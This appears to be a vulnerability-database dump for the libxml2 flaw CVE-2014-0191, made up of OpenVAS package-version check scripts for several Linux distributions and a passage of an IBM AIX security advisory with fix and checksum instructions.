script_tag(name:\"insight\", value:\"The libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\");\n script_tag(name:\"affected\", value:\"libxml2 on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0749\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-April/021029.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~5.el7_1.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~5.el7_1.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~5.el7_1.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-static\", rpm:\"libxml2-static~2.9.1~5.el7_1.2\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-31T10:48:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.", "modified": "2017-07-14T00:00:00", "published": "2014-07-11T00:00:00", "id": "OPENVAS:702978", "href": "http://plugins.openvas.org/nasl.php?oid=702978", "type": "openvas", "title": "Debian Security Advisory DSA 2978-1 (libxml2 - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2978.nasl 6724 2017-07-14 09:57:17Z teissa $\n# Auto-generated from advisory DSA 2978-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libxml2 on Debian Linux\";\ntag_insight = \"XML is a metalanguage to let you design your own markup language.\nA regular markup language defines a way to describe information in\na certain class of documents (eg HTML). XML lets you define your\nown customized markup languages for many classes of document. It\ncan do this because it's written in SGML, the international standard\nmetalanguage for markup languages.\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 2.8.0+dfsg1-7+wheezy1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.9.1+dfsg1-4.\n\nWe recommend that you upgrade your libxml2 packages.\";\ntag_summary = \"Daniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702978);\n script_version(\"$Revision: 6724 $\");\n script_cve_id(\"CVE-2014-0191\");\n script_name(\"Debian Security Advisory DSA 2978-1 (libxml2 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-14 11:57:17 +0200 (Fri, 14 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-07-11 00:00:00 +0200 (Fri, 11 Jul 2014)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2978.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.8.0+dfsg1-7+wheezy1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868768", "type": "openvas", "title": "Fedora Update for mingw-libxml2 FEDORA-2014-17609", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mingw-libxml2 FEDORA-2014-17609\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868768\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:50:49 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for mingw-libxml2 FEDORA-2014-17609\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mingw-libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"mingw-libxml2 on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17609\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147320.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"mingw-libxml2\", rpm:\"mingw-libxml2~2.9.2~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-05-19T00:00:00", "id": "OPENVAS:1361412562310841826", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841826", "type": "openvas", "title": "Ubuntu Update for libxml2 USN-2214-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2214_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for libxml2 USN-2214-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841826\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-19 11:25:10 +0530 (Mon, 19 May 2014)\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Ubuntu Update for libxml2 USN-2214-1\");\n\n script_tag(name:\"affected\", value:\"libxml2 on Ubuntu 14.04 LTS,\n Ubuntu 13.10,\n Ubuntu 12.10,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"insight\", value:\"Daniel Berrange discovered that libxml2 would incorrectly\nperform entity substitution even when requested not to. If a user or automated\nsystem were tricked into opening a specially crafted document, an attacker\ncould possibly cause resource consumption, resulting in a denial of service.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2214-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2214-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 LTS|13\\.10|12\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-3ubuntu4.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.8.dfsg-5.1ubuntu4.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.7.6.dfsg-1ubuntu1.11\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU13.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-3ubuntu2.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2\", ver:\"2.8.0+dfsg1-5ubuntu2.5\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "description": "Oracle Linux Local Security Checks ELSA-2015-0749", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123148", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-0749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0749.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123148\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0749\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0749 - libxml2 security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0749\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0749.html\");\n script_cve_id(\"CVE-2014-0191\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~5.0.1.el7_1.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~5.0.1.el7_1.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~5.0.1.el7_1.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libxml2-static\", rpm:\"libxml2-static~2.9.1~5.0.1.el7_1.2\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "aix": [{"lastseen": "2020-04-22T00:52:15", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Fri Aug 15 10:26:30 CDT 2014\nUpdated: Fri Aug 22 08:17:41 CDT 2014\nUpdate: fixed APAR availability dates\n|Update: Mon Aug 25 15:18:37 CDT 2014\n|Update Corrected a couple Service Pack level#s\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\n\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: AIX libxml2 vulnerability\n\nPLATFORMS: AIX 6.1 and 7.1 releases\n VIOS 2.2.*\n\nSOLUTION: Apply the fix as described below\n\nTHREAT: A remote attacker could exploit this vulnerability using a\n specially-crafted XML document containing malicious attributes\n to consume all available CPU resources.\n\nCVE Number: CVE-2014-0191 CVSS=5.0\n\nReboot required? NO \nWorkarounds? NO\nProtected by FPM? NO\nProtected by SED? NO\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION\n\n Libxml2 is vulnerable to a denial of service, caused by the expansion of \n internal entities within the xmlParserHandlePEReference().\n\nII. CVSS\n\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/93092\n for more information\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n Note: To use the following commands on VIOS you must first\n execute:\n\n oem_setup_env\n\n To determine if your system is vulnerable, execute the following\n command:\n\n lslpp -L bos.rte.control\n\n The following fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n bos.rte.control 6.1.8.0 6.1.8.17 key_w_fix\n bos.rte.control 6.1.9.0 6.1.9.15 key_w_fix\n bos.rte.control 7.1.2.0 7.1.2.17 key_w_fix\n bos.rte.control 7.1.3.0 7.1.3.15 key_w_fix\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ----------------------------------------------------------------\n bos.rte.control 6.1.8.0(2.2.2.0) 6.1.8.17(2.2.2.4)\n bos.rte.control 6.1.9.0(2.2.3.0) 6.1.9.15(2.2.3.3)\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability KEY\n ------------------------------------------------------------\n| 6.1.8 IV62447 12/31/2014 SP6 key_w_apar\n 6.1.9 IV62448 10/24/2014 SP4 key_w_apar\n| 7.1.2 IV62449 12/31/2014 SP6 key_w_apar\n 7.1.3 IV62450 10/24/2014 SP4 key_w_apar\n \n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV62447\n http://www.ibm.com/support/docview.wss?uid=isg1IV62448\n http://www.ibm.com/support/docview.wss?uid=isg1IV62449\n http://www.ibm.com/support/docview.wss?uid=isg1IV62450\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/libxml2_fix.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n ---------------------------------------------------\n 6.1.8.4 IV62447s4a.140715.epkg.Z key_w_fix\n 6.1.9.3 IV62448s3a.140715.epkg.Z key_w_fix\n 7.1.2.4 IV62449s4a.140715.epkg.Z key_w_fix\n 7.1.3.3 IV62450s3a.140715.epkg.Z key_w_fix\n\n VIOS Level Interim Fix (*.Z)\n -------------------------------------\n 2.2.2.4 IV62447s4a.140715.epkg.Z\n 2.2.3.3 IV62448s3a.140715.epkg.Z\n\n To extract the fixes from the tar file:\n\n tar xvf libxml2_fix.tar\n cd libxml2_fix\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command is the following:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n c3b02f8faf29386056616d4ec015acc47d5b8849e84a6f10912db62082fd8a23 IV62447s4a.140715.epkg.Z key_w_csum\n d0beae655b28178f13952fb0da831e028a28b9ed25d3cfe267e61cbcf08ff5aa IV62448s3a.140715.epkg.Z key_w_csum\n 2ce78311783f31c76abc8fba4d8f4ebeb376c64e23c268f954b0b9356d431755 IV62449s4a.140715.epkg.Z key_w_csum\n 3b414db115af1f4d32879474d14d8aaed276f149db6bc022e398f2c58a6da0a2 IV62450s3a.140715.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc.sig\n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n Ti preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a 